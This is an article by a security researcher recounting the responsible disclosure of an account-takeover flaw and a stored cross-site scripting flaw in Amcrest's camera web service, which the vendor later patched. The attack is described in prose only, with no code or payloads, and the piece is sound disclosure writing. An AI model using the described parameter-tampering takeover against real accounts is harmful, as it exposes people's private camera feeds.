A Real-Life Look into Responsible Disclosure for Security Vulnerabilities
A researcher gives us a glimpse into what happened when he found a problem with an IoT device.
As an information security researcher, a major part of my job is to help software and hardware manufacturers fix security issues before they're exploited by bad guys. When white hat hackers like me find a new zero-day vulnerability in devices or software, we report it directly to the vendor using a series of steps called "responsible disclosure."
I reviewed this process in an earlier post here on Dark Reading. Unfortunately, the disclosure process is sometimes criticized. Some accuse manufacturers of not fixing the problems with their devices, while others accuse researchers of releasing vulnerability information recklessly. But based on my personal experience reporting vulnerabilities, I strongly believe disclosure is beneficial for all parties involved.
More on Security
Live at Interop ITX
To prove this point, I'd like to walk you through a recent research project I completed so you can see the steps we take to find and responsibly disclose a new vulnerability. Some quick background: I'm part of WatchGuard's Threat Lab, and we recently launched an ongoing research project that evaluates Internet of Things devices in response to the growing threats associated with the Mirai botnet. It's worth noting that the vendor highlighted in this example was exemplary in responding to our disclosure and worked to immediately patch the vulnerability.
The product I'll cover in this article is the Amcrest IPM-721S Wireless IP camera. This webcam allows users to view footage at Amcrest's website (called Amcrest View). The first thing I attempted was the obvious goal: viewing from a camera that was not associated with my account. Let's jump in.
I performed most of my investigation using Burp Suite's proxy. My attempts to retrieve connection information for a specific camera with an unauthenticated session failed, confirming that Amcrest verifies ownership of each camera's serial number by the authenticated user before providing connection details. No vulnerability here.
If I couldn't view a camera that I didn't own, how about simply taking ownership of the account that owned the camera?
Amcrest View, like most Web applications, lets users modify account settings such as the associated email address. To change the email address associated with an account, the browser submits a POST request. The POST request contains several parameters with the important ones being “user.userName” and “user.email.” A successful request tells Amcrest View to set the email address for the username in the user.userName parameter to the value of the user.email parameter. As it turned out, my request was successful even when the user.userName parameter didn't match the username of the currently authenticated user session. Houston, we have a problem.
If I wanted to exploit this vulnerability, I could have modified the email address associated with any account and then issued a password reset to take over the account and obtain live access to their cameras (creepy, right?). While confirming the unauthorized account modification vulnerability, I also found the input I passed in the user.email parameter was not validated or fully sanitized. This means the software did not have code to check that the user.email parameter was, in fact, an email address. This could be exploited to inject arbitrary JavaScript into a victim's session — a perfect example of a stored cross-site scripting vulnerability. Attackers use cross-site scripting vulnerabilities to siphon off authentication credentials and load malicious websites full of malware without the victim's knowledge.
After discovering this vulnerability, I turned my notes, screenshots, and code samples into a vulnerability disclosure report, which you can read in full here. I submitted this report to Amcrest on November 4, 2016. Many large vendors have a process in place for reporting vulnerabilities, and if not, a researcher usually sends an email encrypted with the vendor's public PGP key. In this case, I contacted Amcrest's support team to inquire how they would like me to report the vulnerability. Ultimately, I submitted my vulnerability report through a support case.
Now the important question — what is the appropriate amount of time to allow a researcher to respond before publicly disclosing a vulnerability? A researcher should allow vendors a reasonable amount of time to investigate and patch a vulnerability, but there's no industry standard for how long that is. I opt for 60 days, which is common.
Once the vendor has issued a patch, or if the vendor has not responded in a reasonable amount of time, a researcher will usually publish their vulnerability report publicly. This allows end users to protect themselves if the vendor can't or won't fix the problem (the implied threat of public disclosure can put pressure on vendors to fix security issues quickly).
Fortunately, that was not an issue in this case. Amcrest got back to me in just four days to confirm my report. By early December, it had patched the vulnerabilities and issued a security notice that urged customers to update their camera's firmware. I published my security report, satisfied I had helped at least one company and its users become more secure. This was a win-win for all parties involved.
Contrary to what you might read in the news, most vulnerabilities reported to manufacturers turn out like this one. Both parties benefit; the vendor makes their products and customers more secure, and the researcher increases public awareness of vulnerabilities and builds their reputation by publishing their findings. It's not a perfect system, but I strongly believe it's beneficial for everyone involved.
Related Content:
About the Author
You May Also Like